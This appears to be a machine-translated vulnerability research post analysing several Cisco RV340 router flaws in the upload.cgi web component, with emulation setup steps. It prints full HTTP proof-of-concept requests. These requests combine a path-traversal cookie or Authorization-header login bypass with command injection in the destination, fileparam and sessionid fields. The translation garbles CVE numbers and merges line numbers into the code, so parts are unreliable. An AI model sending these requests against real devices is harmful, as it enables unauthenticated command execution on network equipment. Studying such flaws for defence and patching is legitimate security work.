Android coordinatorLayout AppBar

2022-12-20   ES  

01 Introduction

This article is mainly based on the research and analysis of the Cisco RV340 command executing vulnerability (CVE-20122-20707). Although the use of this vulnerability requires identity verification, it can be achieved through CVE-20122-20705 to bypass the existing identity verification mechanism. Unconditional command execution. History-related vulnerabilities also include: CVE-2020-3451, CVE-2021-1473, CVE-2021-1472, we will analyze one by one.

02 Environment Construction

2.1 firmware download

can be downloaded to the firmware on the official website of cisco:

https://software.cisco.com/download/home/286287791/type/282465789/release/1.0.03.26?catid=268437899

2.2 firmware decompression

Recommended 7Z-ZIP software to extract OpenWrt-Comcerto2000-HGW-ROOTFS-UBI_NAND.IMG

\RV34X-v1.0.03.22-2021-06-14-02-33-28-AM.img\RV34X-v1.0.03.22-2021-06-14-02-33-28-AM\fw.gz\fw\openwrt-comcerto2000-hgw-rootfs-ubi_nand.img

The UBI format IMG gets binwalk to decompress it, but here is a bit small pit. Binwalk will reset the soft link to/dev/null.

I forcibly bypass this logic by modifying the binwalk code:

binwalk/modules/extractor.py

2.3 QEMU system simulation

Modify the network configuration of the Ubuntu host, modify the system’s network interface configuration file/etc/network/interfaces.

Edit/ETC/QEMU-IFUP

Specific network configuration can refer to:
https://blog.csdn.net/QQ1084283172/article/details/69378333
Restart the virtual machine, because the network card of my Ubuntu host is NAT, and the bridge is to receive the nat network.

Download the corresponding Debian QEMU image

 https://people.debian.org/~aurel32/qemu/armhf/

Start the QEMU virtual machine:

1 sudo qemu-system-arm -M vexpress-a9 -kernel vmlinuz-3.2.0-4-vexpress -initrd initrd.img-3.2.0-4-vexpress -drive if=sd,file=debian_wheezy_armhf_standard.qcow2 -append "root=/dev/mmcblk0p2 console=tty0" -net nic -net tap -nographic  

Pass the solution to the QEMU virtual machine:

1 scp -r 1.tar   [email protected]192.168.250.173:/root/

Decodify and cut into the Chroot environment:

1 tar zxvf 1.tarchmod -R 777 rootfs2 cd rootfs3 sudo mount --bind /proc proc4 sudo mount --bind /dev dev5 chroot . /bin/sh

Gradually start the NGIX service:

1 /etc/init.d/boot boot2 generate_default_cert3 /etc/init.d/confd start4 /etc/init.d/nginx start

Try to visit web page:

At this point, the simulation environment is completed, and the vulnerability test can be started.

2.4 debugging skills

Because CGI starts the request in the form of UWSGI sub -processes, requests a process at a time, using GDBSERVER is not good at ATTACH. Therefore, directly modify the binary file of the upload.cgi, modify the assembly and compilation of yourself at the main position of the main function, and get a dead cycle:

This process will always be stuck. Wait until the GDBSERVER Attach, and then modify the memory method to modify the code as the original order logic:

03 CVE-2022-20705

This vulnerability is an authorized vulnerability caused by improper nginx configuration. It is the pre-conditions used by the command executing vulnerability (CVE-20122-20707).

The

command to execute the vulnerability requires users to access the UPLOAD page, which is a page that requires power. Check the nginx configuration file and configuration reference relationship. The access to the/upload path is controlled by /var/nginx/conf.d/Web.upload.conf

 1 location / form - file - upload {
    2     include uwsgi_params; 3     proxy_buffering off; 4     uwsgi_modifier1 9; 5     uwsgi_pass 127.0.0.1 : 9003; 6     uwsgi_read_timeout 3600; 7     uwsgi_send_timeout 3600; 8 } 9 location / upload {
   set $deny 1;10     if ( - f / tmp / websession / token / $cookie_sessionid) {
   11         set $deny "0";12     }13     if ($deny = "1") {
   14         return 403;15     }16     upload_pass / form - file - upload;17     upload_store / tmp / upload;18     upload_store_access user: rw group: rw all: rw;19     upload_set_form_field $upload_field_name.name "$upload_file_name";20     upload_set_form_field $upload_field_name.content_type "$upload_content_type";21     upload_set_form_field $upload_field_name.path "$upload_tmp_path";22     upload_aggregate_form_field "$upload_field_name.md5""$upload_file_md5";23     upload_aggregate_form_field "$upload_field_name.size""$upload_file_size";24     upload_pass_form_field "^.*$";25     upload_cleanup 400 404 499 500 - 505;26     upload_resumable on;

27

As can be seen, nginx will be accessed by judging whether the/TMP/Websession/token/$ cookie_sessionid file exists. $ cookie_sessionid can be controlled by the cookies that we pass. We can set the value of $ cookie_sessionid to a must -exist, such as …../../../../etc/passwd, and you can bypass it by bypassing The judgment mechanism.

But in addition to the configuration of nginx, there is also a format check that passed into the cookie in the UPLOAD.CGI program, which is directly introduced ../../../../akes The format of the code side is verified:

else if ( !strcmp(v5, "/upload")         && HTTP_COOKIE         && strlen(HTTP_COOKIE) - 16 <= 0x40         && !match_regex("^[A-Za-z0-9+=/]*$", HTTP_COOKIE) )  {
       v24 = v34;    v25 = v35;    v26 = (int)v32;    v27 = StrBufToStr(v41);    sub_12684(HTTP_COOKIE, v24, v25, v26, v27, v36, v37, v38);  }

So is there any way to bypass Nginx’s authentication and at the same time meet the format of the code side?

The key to the

problem lies in the logic of getting cookies back end. Here the code obtains the value of the cookies through For loop, and it is partition when encountering the section:

if ( HTTP_COOKIE ) 
 {
   StrBufSetStr(v40, HTTP_COOKIE);   HTTP_COOKIE = 0;   v13 = (char *)StrBufToStr(v40);   for ( i = strtok_r(v13, ";", &save_ptr); i; i = strtok_r(0, ";", &save_ptr) )   {
        sessionid = strstr(i, "sessionid=");     if ( sessionid )       HTTP_COOKIE = sessionid + '\n';   } }    }

In other words, we can pass two sessionids in the cookie,The previous one used to bypass Nginx, and the latter one to match the verification regularity of upload.cgi, the code will take the last sessionid as the parameter value of the transmission:

Cookie: sessionid=../../../etc/passwd;sessionid=Y2lzY28vMTI3LjAuMC4xLzEx;

So you can successfully bypass the authentication and enter the program logic of upload.cgi.

04  CVE-2022-20707

After bypassed the login restrictions through CVE-20122-20705, there is still an command to execute vulnerabilities in the upload.cgi itself.

Here is a very obvious command stitching. UPLOAD.CGI will process the parameters submitted to the request into json and are stitched into the command. Then we use ‘; {cmd};’ can successfully execute the command.

The parameters that can be received by

upload.cgi include:

 1 jsonutil_get_string(dword_2324C, &v31, "\"file.path\"", -1);
 2 jsonutil_get_string(dword_2324C, &haystack, "\"filename\"", -1);
 3 jsonutil_get_string(dword_2324C, &v32, "\"pathparam\"", -1);
 4 jsonutil_get_string(dword_2324C, &v33, "\"fileparam\"", -1);
 5 jsonutil_get_string(dword_2324C, &v34, "\"destination\"", -1);
 6 jsonutil_get_string(dword_2324C, &v35, "\"option\"", -1);
 7 jsonutil_get_string(dword_2324C, &v36, "\"cert_name\"", -1);
 8 jsonutil_get_string(dword_2324C, &v37, "\"cert_type\"", -1);
 9 jsonutil_get_string(dword_2324C, &v38, "\"password\"", -1);

The CGI uses Nginx file upload module to obtain parameters, and some parameters are generated by the module. We try to choose parameters that do not affect the normal logic of the program for stitching, such as Destination and Option

The command execution string after stitching is as follows:

You can see that the command has been executed:

Bond the permissions of CVE-20122-20705 by bypasses, and finally the POC is:

 1 POST /upload HTTP/1.1 2 Host: 192.168.250.173 3 Content-Length: 729 4 Accept: application/json, text/plain, */* 5 optional-header: header-value 6 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36 7 Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryz6gIo5kcTkAlkCwX 8 Origin: http://192.168.250.173 9 Referer: http://192.168.250.173/index.html10 Accept-Encoding: gzip, deflate11 Accept-Language: zh-CN,zh;q=0.9,en-US;q=0.8,en;q=0.712 Cookie: sessionid=../../../etc/passwd;sessionid=Y2lzY28vMTI3LjAuMC4xLzEx;

13 Connection: close

14

15 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX

16 Content-Disposition: form-data; name="sessionid"

17
18 EU6DJKEIWO19 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX20 Content-Disposition: form-data; name="pathparam"

21
22 Firmware23 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX24 Content-Disposition: form-data; name="fileparam"

25
26 file00127 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX28 Content-Disposition: form-data; name="destination"29

30 x';ls>/tmp/download/1.xml;'31 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX32 Content-Disposition: form-data; name="option"33 

34 x35 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX36 Content-Disposition: form-data; name="file"; filename="1.img"37 Content-Type: application/octet-stream38

39 111140 ------WebKitFormBoundaryz6gIo5kcTkAlkCwX--

05  CVE-2020-3451

1.0.03.18 and the Nginx configuration in the previous version did not authorize the access to the access check. Select 1.0.00.33 for analysis. The version of the CGI does not have an authorized verification of the path.

CP command to be passed into FileParam during stitching

When the FileParam parameter is passed into a malicious stitching command, it can be executed

POC:

 1 POST /upload HTTP/1.1 2 Connection: close 3 Accept-Encoding: gzip, deflate 4 Accept: application/json, text/plain, */* 5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 6 Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2 7 Host: 186.86.126.88:443 8 Content-Type: multipart/form-data; boundary=---------------------------42194771962641085195329489787 9 Content-Length: 61410
11 -----------------------------4219477196264108519532948978712 Content-Disposition: form-data; name="sessionid"13
14 FOOT15 -----------------------------4219477196264108519532948978716 Content-Disposition: form-data; name="fileparam"17
18 file001;ls>/www/download/3.xml;19
20 -----------------------------4219477196264108519532948978721 Content-Disposition: form-data; name="pathparam"22
23 Firmware24 -----------------------------4219477196264108519532948978725 Content-Disposition: form-data; name="file"; filename="1233.img"26 Content-Type: application/octet-stream27
28 11111111111111129 -----------------------------42194771962641085195329489787--

06  CVE-2021-1473 & CVE-2021-1472

1.0.03.20 version of the web.upload.conf as

 1 location /form-file-upload {  

 2   include uwsgi_params; 3   proxy_buffering off; 4   uwsgi_modifier1 9;   uwsgi_pass 127.0.0.1:9003; 6   uwsgi_read_timeout 3600; 7   uwsgi_send_timeout 3600; 8 }

 9 location /upload {
   11   set $deny 1;12

13       if ($http_authorization != "") {
   14               set $deny "0";15       }16

17       if (-f /tmp/websession/token/$cookie_sessionid) {
   18               set $deny "0";19       }20

21       if ($deny = "1") {
   22               return 403;23       }24

25  upload_pass /form-file-upload;26  upload_store /tmp/upload;27  upload_store_access user:rw group:rw all:rw;28  upload_set_form_field $upload_field_name.name "$upload_file_name";29  upload_set_form_field $upload_field_name.content_type "$upload_content_type";30  upload_set_form_field $upload_field_name.path "$upload_tmp_path";31  upload_aggregate_form_field "$upload_field_name.md5" "$upload_file_md5";32  upload_aggregate_form_field "$upload_field_name.size" "$upload_file_size";33  upload_pass_form_field "^.*$";34  upload_cleanup 400 404 499 500-505;35  upload_resumable on;36 }

As long as you add Authorization to the head to make $ http_authorization is not empty, thereby bypass your identity verification.

When the version of the UPLOAD.CGI is performed by the CURL command stitching, A1 is passed into the sessionid in Cookie.

The final POC is:

 1 POST /upload HTTP/1.1 2 Connection: close 3 Accept-Encoding: gzip, deflate 4 Accept: application/json, text/plain, */* 5 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 6 Host: 186.86.126.88:443 7 Cookie: sessionid='&ls>/tmp/download/2.xml&';  8 Authorization: YWRtaW46YWRtaW4= 9 Content-Length: 57010 Content-Type: multipart/form-data; boundary=5097417339e2369be225700925a7175811

12 --5097417339e2369be225700925a7175813 Content-Disposition: form-data; name="sessionid"14

15 foobar16 --5097417339e2369be225700925a7175817 Content-Disposition: form-data; name="destination"18

19 x

20 --5097417339e2369be225700925a7175821 Content-Disposition: form-data; name="fileparam"22

23 Configuration24 --5097417339e2369be225700925a7175825 Content-Disposition: form-data; name="pathparam"26

27 Configuration28 --5097417339e2369be225700925a7175829 Content-Disposition: form-data; name="file"; filename="1233.xml"30 Content-Type: text/xml31

32 123333333 --5097417339e2369be225700925a71758--

07 Summary

Below the summary of the vulnerability of the upload.cgi series:

source

Related Posts

Linux C ++ Multi -thread programming foundation -condition variables and semaphores

CCLM improvement

Multi -angle review recommendation system

generic array list and reflection

Android coordinatorLayout AppBar

Random Posts

Vue music project singer page rolling and top effect

MySQL (4) Inner connection sub -query (nested query) in, not in, exist, not exist combined query union union all

[Game interaction design] How to use interactive thinking to create a more sense of substitution? Netease

html-cssday1: CSS points supplementary instructions, project drills

CentOS7 compile and install SVN (subversion1.9.7)